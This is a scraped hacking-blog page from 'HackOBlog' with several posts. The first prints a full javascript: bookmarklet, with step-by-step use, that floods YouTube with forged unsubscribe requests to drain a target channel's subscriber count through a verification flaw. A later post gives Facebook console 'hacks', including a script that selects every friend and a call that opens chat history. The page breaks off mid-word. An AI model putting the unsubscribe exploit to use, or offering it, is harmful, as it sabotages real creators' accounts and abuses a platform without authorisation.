YouTube subscriber glitch Fred and TunderF00T got hacked

Anonymous with Guy Fawkes masks ...

Today multiple YouTube accounts got “hacked” it’s still going on the attack was perpetrated by the /B/tards of the ever more infamous 4Chan ” thanks moot”, accounts that were effected includes Fred and TunderF00t ,the problem has not yet been sorted, the  YouTube subscriber glitch allows an attacker to take out all of the subscribers of a channel, it uses a hole in the JavaScript lack of verification.

I will wright up how this script worked but for now here is the malicious code.

This is how it works, the script in the API usually requires a user to validate the action , the script overrides that and picks a random user to validate and un-subscribes them, the user isn’t in actuality un-subscribed and the counter is mealy decremented.YouTube  have had problems in the past with the counters being artificially increased, they haven’t fixed the problem and all they do is recount the subscribers.

DO not do this!!

1 Locate The target channel and subscribe

2 Open multiple page tabs

3 Paste this code into the browsers address bar

javascript:function unsubscribe() {
httpreq=new XMLHttpRequest();
httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);
httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));
if(!httpreq.responseXML) {
setTimeout('unsubscribe()', timeout);
return;
}
if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!=' </address>
<h2>You have successfully unsubscribed.</h2>
') {
alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
} else if((window.status=++count)!=times) {
setTimeout('unsubscribe()', timeout);
} else {
alert('DUN');
}
}
count=0;
if((username=prompt('enter target\'s username', '\\*username here *\\'))!=null) {
if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {
if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
unsubscribe();
}
}
}
void(0);

A quick note the code no longer works, there will be more attacks like this in the future so make sure you subscribe for more tips and hacks from the HackOBlog team, thanks to InfouPlink for the plug

Why Hello There

Hello there internet, I am pleased to be making my debut on Hack o blog. My name is Dan AKA x2i and I would like to take a moment to tell you a little about me.

I am an Xbox 360 gamer, I am also an Xbox Ambassador so hit me up if you need any assistance on Xbox Live or 360 in general. I also run an Xbox Community at XboxResource.com

My hobbies include Programming both web sites and windows applications, I also used to make games in Adobe Flash, however I haven’t really got the time to commit to massive projects at the moment.

My general blogs will mainly consist of programming, i.e. web programming (HTML, CSS, JavaScript, Ajax, PHP, MySQL) or windows app’s (VB.NET, VB6, VBA). I may also blog about Xbox 360 tips and tricks for anyone interested. But you may just find me blogging about anything random which I think you might enjoy from time to time. So that’s me…

Peace Out!

FaceBook Hacks with Java script

Ok well today I’m going to demonstrate some sweet ass, FaceBook hacks with javascript.

If you didn’t know already, FaceBook utilizes a web development technology called Ajax, which in its simplest form is a java script front end. This means that you can edit it by using javascript and it’s all in your browser, yay.

Black FaceBook:

javascript:void(document.getElementById('fb_menubar').style.background='Black');

Try changing the end colour to red or green.

and thanks to x2i4eva

javascript:void(document.getElementById('menubar_container').style.background='#000');

this will change the entire bar.

FaceBook Hack: Get Chat History Even When Friends Aren’t Online

Step one look at the URL of your friend

http://www.facebook.com/home.php#/profile.php?id=123132132213&ref=nf

Step two

Get their “id=123132132213” Copy it

Step one three

Then mod the JavaScript to use it

javascript:buddyList.itemOnClick(123132132213);

And a chat window will pop open showing chat history

Select all for friends to send stuff to:

When on the select box just use this JavaScript.

javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] === 'object'){fs.click(elms[fid]);}}

Select